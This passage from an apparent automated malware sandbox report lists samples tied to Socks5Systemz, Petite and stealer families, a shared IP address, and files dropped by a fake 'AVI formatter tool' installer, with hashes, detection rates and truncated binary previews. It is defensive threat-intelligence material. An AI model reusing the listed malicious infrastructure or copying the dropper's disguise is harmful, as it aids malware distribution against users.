                                                                                                                DqhHo6K94H.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 65.109.80.185
                                                                                                                scruurP1Ht.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 65.109.80.185
                                                                                                                hMfGY6bjrA.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 65.109.80.185
                                                                                                                Y1qP3rL3j7.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 65.109.80.185
                                                                                                                j2po8ek0US.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 65.109.80.185
                                                                                                                dG5B3oQKV8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 65.109.80.185
                                                                                                                aneRE7M79c.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 65.109.80.185
                                                                                                                PK11kli186.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 65.109.80.185
                                                                                                                k1g5QozhKy.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 65.109.80.185
                                                                                                                JM9bMa9OuC.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 65.109.80.185
                                                                                                                3o57lm41vm.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 65.109.80.185

                                                                                                                JA3 Fingerprints

                                                                                                                No context

                                                                                                                Dropped Files

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\7z.exe (copy)tuc4.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                  tuc2.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                    tuc6.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                      tuc5.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                        Mnw1ycGC86.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, SmokeLoader, Socks5Systemz, VidarBrowse
                                                                                                                          Eks2sIqVXU.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, SmokeLoader, Socks5Systemz, VidarBrowse
                                                                                                                            SecuriteInfo.com.Heuristic.HEUR.AGEN.1332570.28515.9783.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                              nuMb1lvY7r.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                                fXkyYwWmQN.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                                  DDW1MYBYgo.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                                    XA8GMaaL52.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                                      DqhHo6K94H.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                                        scruurP1Ht.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                                          hMfGY6bjrA.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                                            Y1qP3rL3j7.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                                              9u7RHI3bGw.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                                                j2po8ek0US.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                                                  dG5B3oQKV8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                                                    E6Bljk3z1F.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                                                      bGP2DebTbT.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse

                                                                                                                                                        Created / dropped Files

                                                                                                                                                        C:\ProgramData\JSON Nested Objects 66\JSON Nested Objects 66.exe

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1757184
                                                                                                                                                        Entropy (8bit):7.100391032754955
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:CAQ4shKtykNo8EEOSl9//ryooMLqSB1gmxAMGkTMWad6JNcED/RZVqL3zpUy0NuQ:CAshu19d/mwLqAgjga7n
                                                                                                                                                        MD5:354540FAD1E406C119F19FC2499E892C
                                                                                                                                                        SHA1:98CD46B576B5DE73E16994017103ED293332DDDC
                                                                                                                                                        SHA-256:492E0BA31524B734F4EB4C85C79384CAB14EF3271920C03724607FCAB9991063
                                                                                                                                                        SHA-512:20D95D55E5343AE5A52173F9A84772503EF36AA8C9615C62218564B29EFF82A346349AFFEC2C26D1350AFCE1A0D1B742C312A6E013FB568603A2D7CBA4F35BD4
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e..................................... ....@.................................b........................................%...........#........................................................................... ...............................text............................... ..`.rdata...#... ...0... ..............@..@.data.... ...P.......P..............@....rsrc....#.......0...`..............@..@_vset_8..@.......@..................`...........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\ProgramData\rc66.dat

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4
                                                                                                                                                        Entropy (8bit):0.8112781244591328
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:bln:B
                                                                                                                                                        MD5:DBDF56957D6E4CFD0A3551C6B6191793
                                                                                                                                                        SHA1:9D12E4B32EC3558DD008BABB38FB85DD4DDD10B1
                                                                                                                                                        SHA-256:A508ABA2F9ECB586E66AF72AD7AE18A1B38F8A5BD61E5CA3022ABCDD081C0531
                                                                                                                                                        SHA-512:F0A1DF5E5AA1EB17E18AF7112A0CAD2AF543235481D3200F181309A07ED082392459FA772552FF357B68EEDB178F65CEFA325D7F1C66400E7D67DB69A845398A
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:....

                                                                                                                                                        C:\ProgramData\resource-a.dat

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):128
                                                                                                                                                        Entropy (8bit):2.9545817380615236
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                                                                                                                        MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                                                                                                                        SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                                                                                                                        SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                                                                                                                        SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................

                                                                                                                                                        C:\ProgramData\resource-b.dat

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):128
                                                                                                                                                        Entropy (8bit):1.2701231977328944
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:WAmJuXDz8/:HHzc
                                                                                                                                                        MD5:0D6174E4525CFDED5DD1C9440B9DC1E7
                                                                                                                                                        SHA1:173EF30A035CE666278904625EADCFAE09233A47
                                                                                                                                                        SHA-256:458677CDF0E1A4E87D32AB67D6A5EEA9E67CB3545D79A21A0624E6BB5E1087E7
                                                                                                                                                        SHA-512:86DA96385985A1BA3D67A8676A041CA563838F474DF33D82B6ECD90C101703B30747121A6B7281E025A3C11CE28ACCEDFC94DB4E8D38E391199458056C2CD27A
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:ccddf9e705966c2f471db9..........................................................................................................

                                                                                                                                                        C:\ProgramData\ts66.dat

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):8
                                                                                                                                                        Entropy (8bit):2.0
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:kgln:kgl
                                                                                                                                                        MD5:499AE62316402A220844EBF1FC2682BF
                                                                                                                                                        SHA1:9DF275E32916B1BCE6D21F6C9B6015EBC50F4C15
                                                                                                                                                        SHA-256:06D87BD139932954B213115591FC07BACCB1A66C7C5222C47BF501905C0C71A2
                                                                                                                                                        SHA-512:417027486B0895874509F5029991D846B775AFCDF86BBABE0429054A8799C625366AC0E064D37CA01D442EBE239C333E56E360663A6573F7A6550A7AFBA6D825
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:. .e....

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:modified
                                                                                                                                                        Size (bytes):1757184
                                                                                                                                                        Entropy (8bit):7.100391032754955
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:CAQ4shKtykNo8EEOSl9//ryooMLqSB1gmxAMGkTMWad6JNcED/RZVqL3zpUy0NuQ:CAshu19d/mwLqAgjga7n
                                                                                                                                                        MD5:354540FAD1E406C119F19FC2499E892C
                                                                                                                                                        SHA1:98CD46B576B5DE73E16994017103ED293332DDDC
                                                                                                                                                        SHA-256:492E0BA31524B734F4EB4C85C79384CAB14EF3271920C03724607FCAB9991063
                                                                                                                                                        SHA-512:20D95D55E5343AE5A52173F9A84772503EF36AA8C9615C62218564B29EFF82A346349AFFEC2C26D1350AFCE1A0D1B742C312A6E013FB568603A2D7CBA4F35BD4
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e..................................... ....@.................................b........................................%...........#........................................................................... ...............................text............................... ..`.rdata...#... ...0... ..............@..@.data.... ...P.......P..............@....rsrc....#.......0...`..............@..@_vset_8..@.......@..................`...........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\7z.exe (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):337408
                                                                                                                                                        Entropy (8bit):6.515131904432587
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:3nzsyDn7PDS+FDflUjvJUkbEOyF1rOpsuCOuOff5k4F/lTRHA:3377SKfgvqkbFyFJCRRzH
                                                                                                                                                        MD5:62D2156E3CA8387964F7AA13DD1CCD5B
                                                                                                                                                        SHA1:A5067E046ED9EA5512C94D1D17C394D6CF89CCCA
                                                                                                                                                        SHA-256:59CBFBA941D3AC0238219DAA11C93969489B40F1E8B38FABDB5805AC3DD72BFA
                                                                                                                                                        SHA-512:006F7C46021F339B6CBF9F0B80CFFA74ABB8D48E12986266D069738C4E6BDB799BFBA4B8EE4565A01E90DBE679A96A2399D795A6EAD6EACBB4818A155858BF60
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                        • Filename: tuc4.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: tuc2.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: tuc6.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: tuc5.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: Mnw1ycGC86.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: Eks2sIqVXU.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: SecuriteInfo.com.Heuristic.HEUR.AGEN.1332570.28515.9783.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: nuMb1lvY7r.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: fXkyYwWmQN.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: DDW1MYBYgo.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: XA8GMaaL52.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: DqhHo6K94H.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: scruurP1Ht.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: hMfGY6bjrA.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: Y1qP3rL3j7.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: 9u7RHI3bGw.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: j2po8ek0US.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: dG5B3oQKV8.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: E6Bljk3z1F.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: bGP2DebTbT.exe, Detection: malicious, Browse
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@..|...|...|...p...|...w...|.d.r...|...v...|...x...|.i.#...|...}.|.|.d.!...|...w...|..V....|...v...|.......|. .z...|.Rich..|.........PE..L....r.b.....................>......\........ ....@.......................................@.....................................x....0.......................@...3................................................... ..(............................text............................... ..`.rdata..r.... ......................@..@.data....'..........................@....sxdata...... ......................@....rsrc........0......................@..@.reloc...<...@...>..................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\COPYING.LGPLv2.1 (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:ASCII text
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):26526
                                                                                                                                                        Entropy (8bit):4.600837395607617
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:Lc56OuAbnn0UReX6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7ups0CZuQG:Lc5trLeDnFMz1ReScmc7GshZuQG
                                                                                                                                                        MD5:BD7A443320AF8C812E4C18D1B79DF004
                                                                                                                                                        SHA1:37D2F1D62FEC4DA0CAF06E5DA21AFC3521B597AA
                                                                                                                                                        SHA-256:B634AB5640E258563C536E658CAD87080553DF6F34F62269A21D554844E58BFE
                                                                                                                                                        SHA-512:21AEF7129B5B70E3F9255B1EA4DC994BF48B8A7F42CD90748D71465738D934891BBEC6C6FC6A1CCFAF7D3F35496677D62E2AF346D5E8266F6A51AE21A65C4460
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview: GNU LESSER GENERAL PUBLIC LICENSE. Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.].. Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\OptimFROG.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):214016
                                                                                                                                                        Entropy (8bit):6.676457645865373
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:v3UEEkp2yVTcc295GSSazZq0/OlxAOxN5jZ2Ti30ezAg0Fu9RBhk1Xion:cEEpYcc2G/adqLtxLZ2+vAO9Hhkzn
                                                                                                                                                        MD5:2C747F19BF1295EBBDAB9FB14BB19EE2
                                                                                                                                                        SHA1:6F3B71826C51C739D6BB75085E634B2B2EF538BC
                                                                                                                                                        SHA-256:D2074B91A63219CFD3313C850B2833CD579CC869EF751B1F5AD7EDFB77BD1EDD
                                                                                                                                                        SHA-512:C100C0A5AF52D951F3905884E9B9D0EC1A0D0AEBE70550A646BA6E5D33583247F67CA19E1D045170A286D92EE84E1676A6C1B0527E017A35B6242DD9DEE05AF4
                                                                                                                                                        Malicious:false
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}6,.9WB.9WB.9WB...9.:WB.9WC.hWB....;WB."..&WB."..WB."...WB.9WB.?WB."..8WB."..8WB."..8WB.Rich9WB.........PE..L......W...........!.....N...........n.......`............................................@.........................`...h.......(....`..X....................p.......................................................`...............................text...?L.......N.................. ..`.rdata......`.......R..............@..@.data....W.......2..................@....rsrc...X....`......................@..@.reloc..f&...p...(..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bass_fx.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):34392
                                                                                                                                                        Entropy (8bit):7.81689943223162
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:mYBs3O9YL558R6R8P8W2rjQZQtfTIxRYsetoPNvPWIl+syr:vsUY15mqzW2u8rIxisFcJr
                                                                                                                                                        MD5:EA245B00B9D27EF2BD96548A50A9CC2C
                                                                                                                                                        SHA1:8463FDCDD5CED10C519EE0B406408AE55368E094
                                                                                                                                                        SHA-256:4824A06B819CBE49C485D68A9802D9DAE3E3C54D4C2D8B706C8A87B56CEEFBF3
                                                                                                                                                        SHA-512:EF1E107571402925AB5B1D9B096D7CEFF39C1245A23692A3976164D0DE0314F726CCA0CB10246FE58A13618FD5629A92025628373B3264153FC1D79B0415D9A7
                                                                                                                                                        Malicious:false
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ph..4...4...4.......0...[...0...[...6...4.......V...0...`*..........5....)......Rich4...........................PE..L.....T...........!................6 .......................................0......................................D#..y....!..d.......X............................................................................................................................z..................`....rsrc...........X...................@..@....................................`...petite....... ......................`...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bass_ofr.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5960
                                                                                                                                                        Entropy (8bit):5.956401374574174
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:dj78cqhzbWKlECE7WbjDFf6IhaYYUOAoDf4+XCVhovG9AkM7Ui10:CjlEJ7WbjDFf6waYvdc4gYAkM10
                                                                                                                                                        MD5:B3CC560AC7A5D1D266CB54E9A5A4767E
                                                                                                                                                        SHA1:E169E924405C2114022674256AFC28FE493FBFDF
                                                                                                                                                        SHA-256:EDDE733A8D2CA65C8B4865525290E55B703530C954F001E68D1B76B2A54EDCB5
                                                                                                                                                        SHA-512:A836DECACB42CC3F7D42E2BF7A482AE066F5D1DF08CCCC466880391028059516847E1BF71E4C6A90D2D34016519D16981DDEEACFB94E166E4A9A720D9CC5D699
                                                                                                                                                        Malicious:false
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                        Preview:MZ......................@...................................D.... ..PE..L......I...........!.....4...T......6`....... ...............................p......................................lc.......a.......@..H....................................................................................................................0..........................`....rsrc........@..H...................@..@.............P......................@................`......................`.......................................X....E......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!...`..f.`P....h....j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.e...h....P..0................0..............h.... ..0...........6...........k...........

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bass_tta.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):7910
                                                                                                                                                        Entropy (8bit):6.931925007191986
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:piDl1jKrGer007ia6abHX0d/aeHeN+VPHIJQxNiJCl9AK0f:IDJ9aDb30dCe+4PHIJrJCl9AK0f
                                                                                                                                                        MD5:1268DEA570A7511FDC8E70C1149F6743
                                                                                                                                                        SHA1:1D646FC69145EC6A4C0C9CAD80626AD40F22E8CD
                                                                                                                                                        SHA-256:F266DBA7B23321BF963C8D8B1257A50E1467FAAAB9952EF7FFED1B6844616649
                                                                                                                                                        SHA-512:E19F0EA39FF7AA11830AF5AAD53343288C742BE22299C815C84D24251FA2643B1E0401AF04E5F9B25CAB29601EA56783522DDB06C4195C6A609804880BAE9E9B
                                                                                                                                                        Malicious:false
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                        Preview:MZ......................@...................................D.... ..PE..L.....V...........!.................p.......0............................................@.........................Pr.......q..d....P.......................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`.........................................|7{M..... ........r B`.Zr..P.........T}.e..YJ...=.X..q.}......b.I...G.....^.d...R..-R.....d_.......K.q.H.A=.-S..,_.....L...........2.............u.u.%...:.q....c.[.....`...\.X..8..B.@L..3.7.q.....)!.- ...D.....p...J...RU..Q.A..[.#&..R.....".+4...px/7..\....4...., ..8...5.hV.>] ....3.-.<..I+.<r..T..H,Q..!..i--..+.Zq.[...H... ...N.8..#...a.x.iU.G..-_..R....Z(cT%.....S.P.U:g?...;....&....@..KI.X.Q..PQ..v..*....{..~..}..f....c..`....Q...q..%......,j.4.Y..)....Cf7..

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\basscd.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):18966
                                                                                                                                                        Entropy (8bit):7.620111275837424
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:gOKwxnw6OVDU839fgRgFMkucNauTT80CyTIz2bGjqXOK0Jo:gOHwBDUOe2McQkI0Cyo2Q/o
                                                                                                                                                        MD5:F0F973781B6A66ADF354B04A36C5E944
                                                                                                                                                        SHA1:8E8EE3A18D4CEC163AF8756E1644DF41C747EDC7
                                                                                                                                                        SHA-256:04AB613C895B35044AF8A9A98A372A5769C80245CC9D6BF710A94C5BC42FA1B3
                                                                                                                                                        SHA-512:118D5DACC2379913B725BD338F8445016F5A0D1987283B082D37C1D1C76200240E8C79660E980F05E13E4EB79BDA02256EAC52385DAA557C6E0C5D326D43A835
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                        Preview:MZ......................@...................................D.... ..PE..L...9#.]...........!.........B...............p............................................@.....................................x.......@....................M..........................................................@............................................>..................@..@.rsrc................@..............@..@.......................................@petite...............D..............`..`....................................g5 ....S%,_ .]/.0$R.yB..."@...N.AGG.^.?...1.........&?....v....6.0.. ME..(..gh\jv#.l..#$.Z&...._\`.@.......D.;.C~..m}3..\>.h..@.;.f Tho...(xVs..m.c..F..SS.C...z[....z...... .X.&....HY,...o.d..jP.nr..@.)..W.1#...b..Q.*E8.B..N5.....].........7..A..2c.M.q.O0(.Gi..B.....CT.(..+....>@T j.#!..."..P.u.3..5.Q0K..p....ERvG..._'...ir%m...NT.v:.....g.....8.+....m....8..Z.=.B.......D_..ln...C.......p8...e."...U...+.f..E.=X.j.DeD.X_.Y..n.r.!xWu..\.VB.......`.F.A....dx...

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassflac.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):36752
                                                                                                                                                        Entropy (8bit):7.780431937344781
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:E7epCl6I8YbTvEKXQ2vm+iocmmMt7KjuDnlVahRlmftuY5B:EepUv8aZvmd+7nDDalauy
                                                                                                                                                        MD5:9FF783BB73F8868FA6599CDE65ED21D7
                                                                                                                                                        SHA1:F515F91D62D36DC64ADAA06FA0EF6CF769376BDF
                                                                                                                                                        SHA-256:E0234AF5F71592C472439536E710BA8105D62DFA68722965DF87FED50BAB1816
                                                                                                                                                        SHA-512:C9D3C3502601026B6D55A91C583E0BB607BFC695409B984C0561D0CBE7D4F8BD231BC614E0EC1621C287BF0F207017D3E041694320E692FF00BC2220BFA26C26
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.........n.......................................................B....@.........................P...........d.......@............s.......x..........................................................8............................................j..................@..@.rsrc.... ...........l..............@..@petite...............p..............`..`..................8..u...I.x|}...g{...@..ffe.c4.-.Bj..........U.J.`..s.N:`..I@;..B.kbmj..E%2. `....".]&.&.).BB...E..4u'.....Q.......%....V.............5...y....E..q<w.....j...B..O...p....*.X...m...= .X..........4........~~.8.F@.V...6....;?.5..)S.m.9U......^.zO!1o.F.E. ...H=`2...9.(...4).E.!G..;R.1.#.h0..(*..t8..O...Td.d..~...l.a..U...b<../..W....M6...U*G..II.x........>..I[...v.N/.V..3..Y.c...Zh.i..i.....n....M..D....5o."....(.9.+..z...._$t.T...X#\...N....Q%...>U..|....J

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassmidi.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):36416
                                                                                                                                                        Entropy (8bit):7.842278356440954
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:lshkyPXvH6bPACtmb8boNQdVfCXewki/OvXEApOqmFfSq1oIQMW:lsh3n5Pb8boOdVCuwNEXEAonfSq1JQb
                                                                                                                                                        MD5:BEBA64522AA8265751187E38D1FC0653
                                                                                                                                                        SHA1:63FFB566AA7B2242FCC91A67E0EDA940C4596E8E
